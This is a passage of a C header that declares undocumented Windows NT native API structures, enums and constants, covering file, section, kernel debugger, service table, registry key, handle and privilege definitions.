{\n\tFileFsVolumeInformation = 1,\n\tFileFsLabelInformation,\n\tFileFsSizeInformation,\n\tFileFsDeviceInformation,\n\tFileFsAttributeInformation,\n\tFileFsControlInformation,\n\tFileFsFullSizeInformation,\n\tFileFsObjectIdInformation,\n\tFileFsDriverPathInformation,\n\tFileFsVolumeFlagsInformation,\n\tFileFsMaximumInformation\n} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;\n#endif\n\ntypedef struct _FILE_BASIC_INFORMATION {\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tULONG FileAttributes;\n} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;\n\ntypedef struct _FILE_STANDARD_INFORMATION\n{\n\tLARGE_INTEGER AllocationSize;\n\tLARGE_INTEGER EndOfFile;\n\tULONG NumberOfLinks;\n\tUCHAR DeletePending;\n\tUCHAR Directory;\n} FILE_STANDARD_INFORMATION;\n\ntypedef struct _FILE_INTERNAL_INFORMATION {\n\tLARGE_INTEGER IndexNumber;\n} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;\n\ntypedef struct _FILE_EA_INFORMATION {\n\tULONG EaSize;\n} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;\n\ntypedef struct _FILE_ACCESS_INFORMATION {\n\tACCESS_MASK AccessFlags;\n} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;\n\ntypedef struct _FILE_POSITION_INFORMATION {\n\tLARGE_INTEGER CurrentByteOffset;\n} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;\n\ntypedef struct _FILE_MODE_INFORMATION {\n\tULONG Mode;\n} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;\n\ntypedef struct _FILE_ALIGNMENT_INFORMATION {\n\tULONG AlignmentRequirement;\n} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;\n\ntypedef struct _FILE_NAME_INFORMATION {\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;\n\ntypedef struct _FILE_ALL_INFORMATION {\n\tFILE_BASIC_INFORMATION BasicInformation;\n\tFILE_STANDARD_INFORMATION StandardInformation;\n\tFILE_INTERNAL_INFORMATION InternalInformation;\n\tFILE_EA_INFORMATION EaInformation;\n\tFILE_ACCESS_INFORMATION AccessInformation;\n\tFILE_POSITION_INFORMATION PositionInformation;\n\tFILE_MODE_INFORMATION ModeInformation;\n\tFILE_ALIGNMENT_INFORMATION AlignmentInformation;\n\tFILE_NAME_INFORMATION NameInformation;\n} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;\n\ntypedef struct _FILE_NETWORK_OPEN_INFORMATION {\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER AllocationSize;\n\tLARGE_INTEGER EndOfFile;\n\tULONG FileAttributes;\n} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;\n\ntypedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {\n\tULONG FileAttributes;\n\tULONG ReparseTag;\n} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;\n\ntypedef struct _FILE_ALLOCATION_INFORMATION {\n\tLARGE_INTEGER AllocationSize;\n} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;\n\ntypedef struct _FILE_COMPRESSION_INFORMATION {\n\tLARGE_INTEGER CompressedFileSize;\n\tUSHORT CompressionFormat;\n\tUCHAR CompressionUnitShift;\n\tUCHAR ChunkShift;\n\tUCHAR ClusterShift;\n\tUCHAR Reserved[3];\n} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;\n\ntypedef struct _FILE_DISPOSITION_INFORMATION {\n\tBOOLEAN DeleteFile;\n} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;\n\ntypedef struct _FILE_END_OF_FILE_INFORMATION {\n\tLARGE_INTEGER EndOfFile;\n} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;\n\ntypedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {\n\tLARGE_INTEGER ValidDataLength;\n} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;\n\ntypedef struct _FILE_LINK_INFORMATION {\n\tBOOLEAN ReplaceIfExists;\n\tHANDLE RootDirectory;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;\n\ntypedef struct _FILE_MOVE_CLUSTER_INFORMATION {\n\tULONG ClusterCount;\n\tHANDLE RootDirectory;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;\n\ntypedef struct _FILE_RENAME_INFORMATION {\n\tBOOLEAN ReplaceIfExists;\n\tHANDLE RootDirectory;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;\n\ntypedef struct _FILE_STREAM_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG StreamNameLength;\n\tLARGE_INTEGER StreamSize;\n\tLARGE_INTEGER StreamAllocationSize;\n\tWCHAR StreamName[1];\n} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;\n\ntypedef struct _FILE_TRACKING_INFORMATION {\n\tHANDLE DestinationFile;\n\tULONG ObjectInformationLength;\n\tCHAR ObjectInformation[1];\n} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;\n\ntypedef struct _FILE_COMPLETION_INFORMATION {\n\tHANDLE Port;\n\tPVOID Key;\n} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;\n\n//\n// Define the NamedPipeType flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000\n#define FILE_PIPE_MESSAGE_TYPE 0x00000001\n\n//\n// Define the CompletionMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_QUEUE_OPERATION 0x00000000\n#define FILE_PIPE_COMPLETE_OPERATION 0x00000001\n\n//\n// Define the ReadMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_MODE 0x00000000\n#define FILE_PIPE_MESSAGE_MODE 0x00000001\n\n//\n// Define the NamedPipeConfiguration flags for NtQueryInformation\n//\n\n#define FILE_PIPE_INBOUND 0x00000000\n#define FILE_PIPE_OUTBOUND 0x00000001\n#define FILE_PIPE_FULL_DUPLEX 0x00000002\n\n//\n// Define the NamedPipeState flags for NtQueryInformation\n//\n\n#define FILE_PIPE_DISCONNECTED_STATE 0x00000001\n#define FILE_PIPE_LISTENING_STATE 0x00000002\n#define FILE_PIPE_CONNECTED_STATE 0x00000003\n#define FILE_PIPE_CLOSING_STATE 0x00000004\n\n//\n// Define the NamedPipeEnd flags for NtQueryInformation\n//\n\n#define FILE_PIPE_CLIENT_END 0x00000000\n#define FILE_PIPE_SERVER_END 0x00000001\n\n\ntypedef struct _FILE_PIPE_INFORMATION {\n\tULONG ReadMode;\n\tULONG CompletionMode;\n} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;\n\ntypedef struct _FILE_PIPE_LOCAL_INFORMATION {\n\tULONG NamedPipeType;\n\tULONG NamedPipeConfiguration;\n\tULONG MaximumInstances;\n\tULONG CurrentInstances;\n\tULONG InboundQuota;\n\tULONG ReadDataAvailable;\n\tULONG OutboundQuota;\n\tULONG WriteQuotaAvailable;\n\tULONG NamedPipeState;\n\tULONG NamedPipeEnd;\n} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;\n\ntypedef struct _FILE_PIPE_REMOTE_INFORMATION {\n\tLARGE_INTEGER CollectDataTime;\n\tULONG MaximumCollectionCount;\n} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;\n\ntypedef struct _FILE_MAILSLOT_QUERY_INFORMATION {\n\tULONG MaximumMessageSize;\n\tULONG MailslotQuota;\n\tULONG NextMessageSize;\n\tULONG MessagesAvailable;\n\tLARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;\n\ntypedef struct _FILE_MAILSLOT_SET_INFORMATION {\n\tPLARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;\n\ntypedef struct _FILE_REPARSE_POINT_INFORMATION {\n\tLONGLONG FileReference;\n\tULONG Tag;\n} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;\n\n//\n// Define the flags for NtSet(Query)EaFile service structure entries\n//\n\n#define FILE_NEED_EA 0x00000080\n\n//\n// Define EA type values\n//\n\n#define FILE_EA_TYPE_BINARY 0xfffe\n#define FILE_EA_TYPE_ASCII 0xfffd\n#define FILE_EA_TYPE_BITMAP 0xfffb\n#define FILE_EA_TYPE_METAFILE 0xfffa\n#define FILE_EA_TYPE_ICON 0xfff9\n#define FILE_EA_TYPE_EA 0xffee\n#define FILE_EA_TYPE_MVMT 0xffdf\n#define FILE_EA_TYPE_MVST 0xffde\n#define FILE_EA_TYPE_ASN1 0xffdd\n#define FILE_EA_TYPE_FAMILY_IDS 0xff01\n\ntypedef struct _FILE_FULL_EA_INFORMATION {\n\tULONG NextEntryOffset;\n\tUCHAR Flags;\n\tUCHAR EaNameLength;\n\tUSHORT EaValueLength;\n\tCHAR EaName[1];\n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;\n\ntypedef struct _FILE_GET_EA_INFORMATION {\n\tULONG NextEntryOffset;\n\tUCHAR EaNameLength;\n\tCHAR EaName[1];\n} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;\n\ntypedef struct _FILE_GET_QUOTA_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG SidLength;\n\tSID Sid;\n} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION;\n\ntypedef struct _FILE_QUOTA_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG SidLength;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER QuotaUsed;\n\tLARGE_INTEGER QuotaThreshold;\n\tLARGE_INTEGER QuotaLimit;\n\tSID Sid;\n} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;\n\ntypedef struct _FILE_DIRECTORY_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;\n\ntypedef struct _FILE_FULL_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG EaSize;\n\tWCHAR FileName[1];\n} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_FULL_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG EaSize;\n\tLARGE_INTEGER FileId;\n\tWCHAR FileName[1];\n} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_BOTH_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG EaSize;\n\tCCHAR ShortNameLength;\n\tWCHAR ShortName[12];\n\tWCHAR FileName[1];\n} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_BOTH_DIR_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tLARGE_INTEGER CreationTime;\n\tLARGE_INTEGER LastAccessTime;\n\tLARGE_INTEGER LastWriteTime;\n\tLARGE_INTEGER ChangeTime;\n\tLARGE_INTEGER EndOfFile;\n\tLARGE_INTEGER AllocationSize;\n\tULONG FileAttributes;\n\tULONG FileNameLength;\n\tULONG EaSize;\n\tCCHAR ShortNameLength;\n\tWCHAR ShortName[12];\n\tLARGE_INTEGER FileId;\n\tWCHAR FileName[1];\n} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_NAMES_INFORMATION {\n\tULONG NextEntryOffset;\n\tULONG FileIndex;\n\tULONG FileNameLength;\n\tWCHAR FileName[1];\n} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;\n\ntypedef struct _FILE_OBJECTID_INFORMATION {\n\tLONGLONG FileReference;\n\tUCHAR ObjectId[16];\n\tunion {\n\t\tstruct {\n\t\t\tUCHAR BirthVolumeId[16];\n\t\t\tUCHAR BirthObjectId[16];\n\t\t\tUCHAR DomainId[16];\n\t\t};\n\t\tUCHAR ExtendedInfo[48];\n\t};\n} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;\n\ntypedef struct _FILE_FS_VOLUME_INFORMATION {\n\tLARGE_INTEGER VolumeCreationTime;\n\tULONG VolumeSerialNumber;\n\tULONG VolumeLabelLength;\n\tBOOLEAN SupportsObjects;\n\tWCHAR VolumeLabel[1];\n} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;\n\n/*\n** File END\n*/\n\n/*\n** Section START\n*/\n\n#ifndef _SECTION_INFORMATION_CLASS\ntypedef enum _SECTION_INFORMATION_CLASS {\n\tSectionBasicInformation,\n\tSectionImageInformation,\n\tSectionRelocationInformation,\n\tMaxSectionInfoClass\n} SECTION_INFORMATION_CLASS;\n#endif\n\ntypedef struct _SECTIONBASICINFO {\n\tPVOID BaseAddress;\n\tULONG AllocationAttributes;\n\tLARGE_INTEGER MaximumSize;\n} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION {\n\tPVOID TransferAddress;\n\tULONG ZeroBits;\n\tSIZE_T MaximumStackSize;\n\tSIZE_T CommittedStackSize;\n\tULONG SubSystemType;\n\tunion {\n\t\tstruct {\n\t\t\tUSHORT SubSystemMinorVersion;\n\t\t\tUSHORT SubSystemMajorVersion;\n\t\t};\n\t\tULONG SubSystemVersion;\n\t};\n\tULONG GpValue;\n\tUSHORT ImageCharacteristics;\n\tUSHORT DllCharacteristics;\n\tUSHORT Machine;\n\tBOOLEAN ImageContainsCode;\n\tBOOLEAN Spare1;\n\tULONG LoaderFlags;\n\tULONG ImageFileSize;\n\tULONG Reserved[1];\n} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION64 {\n\tULONGLONG TransferAddress;\n\tULONG ZeroBits;\n\tULONGLONG MaximumStackSize;\n\tULONGLONG CommittedStackSize;\n\tULONG SubSystemType;\n\tunion {\n\t\tstruct {\n\t\t\tUSHORT SubSystemMinorVersion;\n\t\t\tUSHORT SubSystemMajorVersion;\n\t\t};\n\t\tULONG SubSystemVersion;\n\t};\n\tULONG GpValue;\n\tUSHORT ImageCharacteristics;\n\tUSHORT DllCharacteristics;\n\tUSHORT Machine;\n\tBOOLEAN ImageContainsCode;\n\tBOOLEAN Spare1;\n\tULONG LoaderFlags;\n\tULONG ImageFileSize;\n\tULONG Reserved[1];\n} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;\n\ntypedef enum _SECTION_INHERIT {\n\tViewShare = 1,\n\tViewUnmap = 2\n} SECTION_INHERIT;\n\n#define SEC_BASED 0x200000\n#define SEC_NO_CHANGE 0x400000\n#define SEC_FILE 0x800000 \n#define SEC_IMAGE 0x1000000 \n#define SEC_RESERVE 0x4000000 \n#define SEC_COMMIT 0x8000000 \n#define SEC_NOCACHE 0x10000000 \n#define SEC_GLOBAL 0x20000000\n#define SEC_LARGE_PAGES 0x80000000 \n\n/*\n** Section END\n*/\n\n/*\n** Kernel Debugger START\n*/\n\n#ifndef _SYSDBG_COMMAND\ntypedef enum _SYSDBG_COMMAND {\n\tSysDbgQueryModuleInformation,\n\tSysDbgQueryTraceInformation,\n\tSysDbgSetTracepoint,\n\tSysDbgSetSpecialCall,\n\tSysDbgClearSpecialCalls,\n\tSysDbgQuerySpecialCalls,\n\tSysDbgBreakPoint,\n\tSysDbgQueryVersion,\n\tSysDbgReadVirtual,\n\tSysDbgWriteVirtual,\n\tSysDbgReadPhysical,\n\tSysDbgWritePhysical,\n\tSysDbgReadControlSpace,\n\tSysDbgWriteControlSpace,\n\tSysDbgReadIoSpace,\n\tSysDbgWriteIoSpace,\n\tSysDbgReadMsr,\n\tSysDbgWriteMsr,\n\tSysDbgReadBusData,\n\tSysDbgWriteBusData,\n\tSysDbgCheckLowMemory,\n\tSysDbgEnableKernelDebugger,\n\tSysDbgDisableKernelDebugger,\n\tSysDbgGetAutoKdEnable,\n\tSysDbgSetAutoKdEnable,\n\tSysDbgGetPrintBufferSize,\n\tSysDbgSetPrintBufferSize,\n\tSysDbgGetKdUmExceptionEnable,\n\tSysDbgSetKdUmExceptionEnable,\n\tSysDbgGetTriageDump,\n\tSysDbgGetKdBlockEnable,\n\tSysDbgSetKdBlockEnable,\n\tSysDbgRegisterForUmBreakInfo,\n\tSysDbgGetUmBreakPid,\n\tSysDbgClearUmBreakPid,\n\tSysDbgGetUmAttachPid,\n\tSysDbgClearUmAttachPid\n} SYSDBG_COMMAND, *PSYSDBG_COMMAND;\n#endif\n\n#ifndef _SYSDBG_VIRTUAL\ntypedef struct _SYSDBG_VIRTUAL\n{\n\tPVOID Address;\n\tPVOID Buffer;\n\tULONG Request;\n} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;\n#endif\n\n/*\n** Kernel Debugger END\n*/\n\n/*\n** System Table START\n*/\n#define NUMBER_SERVICE_TABLES 2\n#define SERVICE_NUMBER_MASK ((1 << 12) - 1)\n\n#if defined(_WIN64)\n\n#if defined(_AMD64_)\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 5)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5)\n\n#endif\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#endif\n\ntypedef struct _KSERVICE_TABLE_DESCRIPTOR {\n\tULONG_PTR Base; //e.g. KiServiceTable\n\tPULONG Count;\n\tULONG Limit;//e.g. KiServiceLimit\n\tPUCHAR Number; //e.g. KiArgumentTable\n} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;\n/*\n** System Table END\n*/\n\n\n/*\n** System Boot Environment START\n*/\n\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 // Size=20\n{\n\tstruct _GUID BootIdentifier;\n\tenum _FIRMWARE_TYPE FirmwareType;\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;\n\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32\n{\n\tstruct _GUID BootIdentifier;\n\tenum _FIRMWARE_TYPE FirmwareType;\n\tunsigned __int64 BootFlags;\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;\n\n/*\n** System Boot Environment END\n*/\n\n/*\n** Mutant START\n*/\n\n#ifndef _MUTANT_INFORMATION_CLASS\ntypedef enum _MUTANT_INFORMATION_CLASS {\n\tMutantBasicInformation\n} MUTANT_INFORMATION_CLASS;\n#endif\n\n#ifndef _MUTANT_BASIC_INFORMATION\ntypedef struct _MUTANT_BASIC_INFORMATION {\n\tLONG CurrentCount;\n\tBOOLEAN OwnedByCaller;\n\tBOOLEAN AbandonedState;\n} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;\n#endif\n\n/*\n** Mutant END\n*/\n\n/*\n** Key START\n*/\n\n#ifndef _KEY_INFORMATION_CLASS \ntypedef enum _KEY_INFORMATION_CLASS {\n\tKeyBasicInformation,\n\tKeyNodeInformation,\n\tKeyFullInformation,\n\tKeyNameInformation,\n\tKeyCachedInformation,\n\tKeyFlagsInformation,\n\tMaxKeyInfoClass\n} KEY_INFORMATION_CLASS;\n#endif\n\n#ifndef _KEY_FULL_INFORMATION\ntypedef struct _KEY_FULL_INFORMATION {\n\tLARGE_INTEGER LastWriteTime;\n\tULONG TitleIndex;\n\tULONG ClassOffset;\n\tULONG ClassLength;\n\tULONG SubKeys;\n\tULONG MaxNameLen;\n\tULONG MaxClassLen;\n\tULONG Values;\n\tULONG MaxValueNameLen;\n\tULONG MaxValueDataLen;\n\tWCHAR Class[1];\n} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;\n#endif\n\n#ifndef _KEY_BASIC_INFORMATION\ntypedef struct _KEY_BASIC_INFORMATION {\n\tLARGE_INTEGER LastWriteTime;\n\tULONG TitleIndex;\n\tULONG NameLength;\n\tWCHAR Name[1];\n} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_INFORMATION_CLASS\ntypedef enum _KEY_VALUE_INFORMATION_CLASS {\n\tKeyValueBasicInformation,\n\tKeyValueFullInformation,\n\tKeyValuePartialInformation,\n\tKeyValueFullInformationAlign64,\n\tKeyValuePartialInformationAlign64,\n\tMaxKeyValueInfoClass\n} KEY_VALUE_INFORMATION_CLASS;\n#endif\n\n#ifndef _KEY_VALUE_BASIC_INFORMATION\ntypedef struct _KEY_VALUE_BASIC_INFORMATION {\n\tULONG TitleIndex;\n\tULONG Type;\n\tULONG NameLength;\n\tWCHAR Name[1]; // Variable size\n} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_FULL_INFORMATION\ntypedef struct _KEY_VALUE_FULL_INFORMATION {\n\tULONG TitleIndex;\n\tULONG Type;\n\tULONG DataOffset;\n\tULONG DataLength;\n\tULONG NameLength;\n\tWCHAR Name[1]; // Variable size\n\t// Data[1]; // Variable size data not declared\n} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_PARTIAL_INFORMATION\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION {\n\tULONG TitleIndex;\n\tULONG Type;\n\tULONG DataLength;\n\tUCHAR Data[1]; // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {\n\tULONG Type;\n\tULONG DataLength;\n\tUCHAR Data[1]; // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;\n#endif\n\n#ifndef _KEY_VALUE_ENTRY\ntypedef struct _KEY_VALUE_ENTRY {\n\tPUNICODE_STRING ValueName;\n\tULONG DataLength;\n\tULONG DataOffset;\n\tULONG Type;\n} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;\n#endif\n\n/*\n** Key END\n*/\n\n/*\n** IoCompletion START\n*/\n\n#ifndef _IO_COMPLETION_INFORMATION_CLASS\ntypedef enum _IO_COMPLETION_INFORMATION_CLASS {\n\tIoCompletionBasicInformation\n} IO_COMPLETION_INFORMATION_CLASS;\n#endif\n\n#ifndef _IO_COMPLETION_BASIC_INFORMATION\ntypedef struct _IO_COMPLETION_BASIC_INFORMATION {\n\tLONG Depth;\n} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;\n#endif\n\n/*\n** IoCompletion END\n*/\n\n/*\n** Event START\n*/\n\n//\n// Event Specific Access Rights.\n//\n\ntypedef enum _EVENT_INFORMATION_CLASS {\n\tEventBasicInformation\n} EVENT_INFORMATION_CLASS;\n\ntypedef enum _EVENT_TYPE {\n\tNotificationEvent,\n\tSynchronizationEvent\n} EVENT_TYPE;\n\ntypedef struct _EVENT_BASIC_INFORMATION {\n\tEVENT_TYPE EventType;\n\tLONG EventState;\n} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;\n\n/*\n** Event END\n*/\n\n/*\n** TIME_FIELDS START\n*/\n\n#ifndef CSHORT\ntypedef short CSHORT;\n#endif\ntypedef struct _TIME_FIELDS {\n\tCSHORT Year; // range [1601...]\n\tCSHORT Month; // range [1..12]\n\tCSHORT Day; // range [1..31]\n\tCSHORT Hour; // range [0..23]\n\tCSHORT Minute; // range [0..59]\n\tCSHORT Second; // range [0..59]\n\tCSHORT Milliseconds;// range [0..999]\n\tCSHORT Weekday; // range [0..6] == [Sunday..Saturday]\n} TIME_FIELDS;\ntypedef TIME_FIELDS *PTIME_FIELDS;\n\n/*\n** TIME_FIELDS END\n*/\n\n/*\n** HANDLE START\n*/\n\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {\n\tUSHORT UniqueProcessId;\n\tUSHORT CreatorBackTraceIndex;\n\tUCHAR ObjectTypeIndex;\n\tUCHAR HandleAttributes;\n\tUSHORT HandleValue;\n\tPVOID Object;\n\tULONG GrantedAccess;\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\n\ntypedef struct _SYSTEM_HANDLE_INFORMATION {\n\tULONG NumberOfHandles;\n\tSYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];\n} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;\n\n/*\n** HANDLE END\n*/\n\n// Privileges\n\n#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)\n#define SE_CREATE_TOKEN_PRIVILEGE (2L)\n#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)\n#define SE_LOCK_MEMORY_PRIVILEGE (4L)\n#define SE_INCREASE_QUOTA_PRIVILEGE (5L)\n#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)\n#define SE_TCB_PRIVILEGE (7L)\n#define SE_SECURITY_PRIVILEGE (8L)\n#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)\n#define SE_LOAD_DRIVER_PRIVILEGE (10L)\n#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)\n#define SE_SYSTEMTIME_PRIVILEGE (12L)\n#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)\n#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)\n#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)\n#define SE_CREATE_PERMANENT_PRIVILEGE (16L)\n#define SE_BACKUP_PRIVILEGE (17L)\n#define SE_RESTORE_PRIVILEGE (18L)\n#define SE_SHUTDOWN_PRIVILEGE (19L)\n#define SE_DEBUG_PRIVILEGE (20L)\n#define SE_AUDIT_PRIVILEGE (21L)\n#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)\n#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)\n#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)\n#define SE_UNDOCK_PRIVILEGE (25L)\n#define SE_SYNC_AGENT_PRIVILEGE (26L)\n#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)\n#define SE_MANAGE_VOLUME_PRIVILEGE (28L)\n#define SE_IMPERSONATE_PRIVILEGE (29L)\n#define SE_CREATE_GLOBAL_PRIVILEGE (30L)\n#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)\n#define SE_RELABEL_PRIVILEGE (32L)\n#define SE_INC_WORKING_SET_PRIVILEGE 